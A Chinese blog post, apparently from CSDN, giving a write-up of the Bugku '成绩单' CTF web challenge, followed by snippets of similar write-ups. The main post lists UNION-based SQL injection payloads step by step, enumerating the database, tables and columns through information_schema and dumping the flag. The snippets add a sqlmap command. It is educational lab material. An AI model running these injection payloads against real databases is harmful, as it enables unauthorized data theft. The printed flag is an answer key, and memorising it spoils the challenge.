bugku 成绩单

最新推荐文章于 2025-04-17 16:56:51 发布
最新推荐文章于 2025-04-17 16:56:51 发布
阅读量7.2k 收藏 6
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/anjiaowangmenghan/article/details/77504729
版权

成绩查询






龙龙龙的成绩单
Math English Chinese
606070
进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4#

发现有四个表且都有回显

于是 就开始爆破吧

通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag

之后通过 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc

很显然我们需要的数据在fl4g这个表里

接下来我们就要暴字段了

通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

得到字段skctf_flag

最后我们就可以开始查询数据了

通过id=-1' union select 1,2,3,skctf_flag from fl4g#

得到BUGKU{Sql_INJECT0N_4813drd8hz4}

如有疑问请联系qq:834368404


Bugku-web之成绩查询
weixin_42939822的博客
03-14 3566
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
bugku成绩单writeup(手动注入、sqlmap注入、python盲注详解)
渗透、攻防、CTF、编程
07-01 953
知识点:SQL注入,三种解法手动注入、sqlmap注入、python盲注 一、手动注入 手动注入前先理解msysql的系统配置 select 1,database(),version();//查询数据库类型和版本 select * from information_schema.schemata //数据库下的所有库 schema_name='mysql' information_schema信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息,SCHEMATA表:提供了当
BugKu——成绩单
D-R0s1的博客
10-08 948
  sql注入在CTF类竞赛中占着很大的比重,在做BugKu的题目的过程中恰好遇到了一个没有任何过滤,直接注入的题目,因为没有过滤,只是单纯的考察sql注入,所以步骤比较固定,语句也比较简单 1.首先,爆列数 1’ order by 4# 1’ order by 5#按照提示分别输入1,2,3都有回显,然后遍历一遍-1’ union select 1,2,3,4# 目录四个表都有回显 2.暴库...
Bugku web-成绩查询
最新发布
m0_46800404的博客
04-17 458
可以发现当输入1' order by 4 -- 有回显,而1' order by 5 -- 无回显,确定查询列数为4,即后面的select语句要有四个参数。再然后就是看这个字段的具体值啦φ(≧ω≦*)♪,朴实无华的查询语句即可:-1' union select 1,2,3,skctf_flag from fl4g --确定好参数,我们就可以来查询数据库里的表名了,这里要注意的是我们要采用-1'来闭合,主要是为了让回显处能显示我们的查询语句返回值,而不是莫名其妙的成绩单。先随便输点数据,看这样子应该有四列。
bugku---成绩单
LuckySec
11-16 552
题目 http://123.206.87.240:8002/chengjidan/index.php 使用sqlmap进行注入 首先输入检测是否有注入点 python E:\Python27\sqlmap\sqlmapproject-sqlmap-6d48df2\sqlmap.py -u “http://123.206.87.240:8002/chengjidan/index.php” --d...
Bugku成绩单
Newbiek的博客
04-02 984
首先,正常输入测试: Burp发现其为post包,只有1到3可以进行查询: 加单引号测试发现,这是一个注入点: 猜测注入的类型,发现and 1=1没有变化,但是1=2也没有变化: 不是数字型注入就试试字符型注入: 下一步就到了测试页面回显的地方的时候了,因为已经可以发现页面上有变动的地方为成绩单前面的位置、三科成绩的分数所以判断一下是不是有4列到5列(可能还有隐藏的东西): 确认了回显...
bugku 成绩查询
m0_51504576的博客
04-21 630
最近刚好在了解sql注入的一些知识,然后刚好刷到了这题,记录一下我的思路吧~ 看到题目页面一个输入框就觉得是和sql注入有关的题目了,首先查看网页源代码: 看到name=id,在火狐浏览器用maxhackerbar打开传递参数试试: 成功查到了成绩单,并且切换1,2,3都可以成功,再判断是字符型注入还是数值型注入: id=1成功查询,id=1’查询失败,id=1’#查询成功,所以该注入类型为字符型注入。 简单说明一下为什么: 如果是数值型注入:where id =1 成功 where id=1’失败 w
一次简单的sql注入 bugku 成绩查询
jzw0831的博客
11-06 1201
一次简单的sql注入 bugku 成绩查询
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 586
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单
BugkuCTF: 成绩单(web)
s0il的博客
04-02 833
题目描述: 让人看上去就是SQL注入。 提交一下,出现三列属性,flag就应该在这里面: 手动注入: 在表单中输入1或者1#或者1--或者1++等返回正常,输入1'返回异常 库名、表名、字段名的获取: 联合查询 id=-1' union select 1,2,3,4# 之后返回: 或者执行-1' orde...
bugku--成绩查询
hxhabcd123的博客
08-28 1829
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
bugku成绩单
qq_51283187的博客
08-13 224
bugku成绩单 今天重温经典做了一遍这个题 哎,SQL注入好多细节都忘了该补补课了。 1 sql注入的时候order by 一定要看好10000000是不是也可以 刚刚做题的时候1" order by 10000000000# 这样都行,就很离谱,起不到想知道有多少列的效果了 2 这个时候我们再换用 1’ order by 4 # ok 1’ order by 5 # error 这样就知道只有’在这里才生效 3 对了还要注意前一个为-1,留出位置。好久不复习了,都要忘了 4 并且还要注意噢, -1 un
BugKu成绩单
Tle_Camouflage的博客
08-23 1523
成绩单(Web) 输入1并进行抓包。 然后按右键,点击copy to file保存文件,这里我保存到了C盘 333.txt。 然后打开sqlmap开始爆库:sqlmap.py -r “C:\333.txt” -p id –current-db -r –> 加载一个文件 -p –>指定参数 –current-db –>获取当前数据库名称(current前有...
成绩单bugku--web)
小白的劝退之路
04-29 477
解法一:手工注入 输入1,2,3分别能查到1,2,3号学生的成绩 SQL注入应该没跑了 输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常,看来过滤了–+ 观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列 接下来就开始暴库名、表名、字段名 尝试联合查询,...
bugku 成绩单 总结
DreamHigh
08-28 3031
试题地址: http://40.125.170.89:49164/index.php 成绩查询     龙龙龙的成绩单 Math English Chinese 60 60 70 方法一:常规方法 进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4# 发现有四个表且都有回显 于是 就开始爆破吧 通过id=-1...
Bugku web 成绩单
S123KO的博客
08-24 346
本题直接在页面中的查询栏输入: 1' order by 4# (求出列数4列) 1' and 1=2 union select 1,2,3,4# (求显示位) 1'and 1=2 union select 1,2,database(),4# (求出数据库skctf_flag) 1'and 1=2 union select 1,2,3,group_concat(table_name)from...
bugku 成绩单详解
qq_35811830的博客
01-26 1325
bugku 成绩单详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
Bugku--学生成绩查询
Golderant的博客
01-17 3088
首先测试正常数据。 尝试在正常数据后加上单引号,发现数据为空,加个注释符发现依旧可以正常输出。 尝试获取列数,因为已经输出名字和3科分数,所以就猜4和5,得知查询结果中有4列。 尝试直接联合查询,这里要记得把前面查询为空。== 根据数据库去查表名 找到fl4g表,下一步,找列名 最后一步,知道表名知道列名啦,去获取数据吧~~ 关于这个题呢,因为表fl
Bugku杂项题目Writeup解析与总结
根据给定的信息,该文档的内容似乎是围绕“bugku杂项题writeup”这个标题展开的,这通常是指一个网络安全竞赛平台(CTF,Capture The Flag)中的杂项(Miscellaneous)类别题目解法的说明文档。杂项题目通常包括各种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值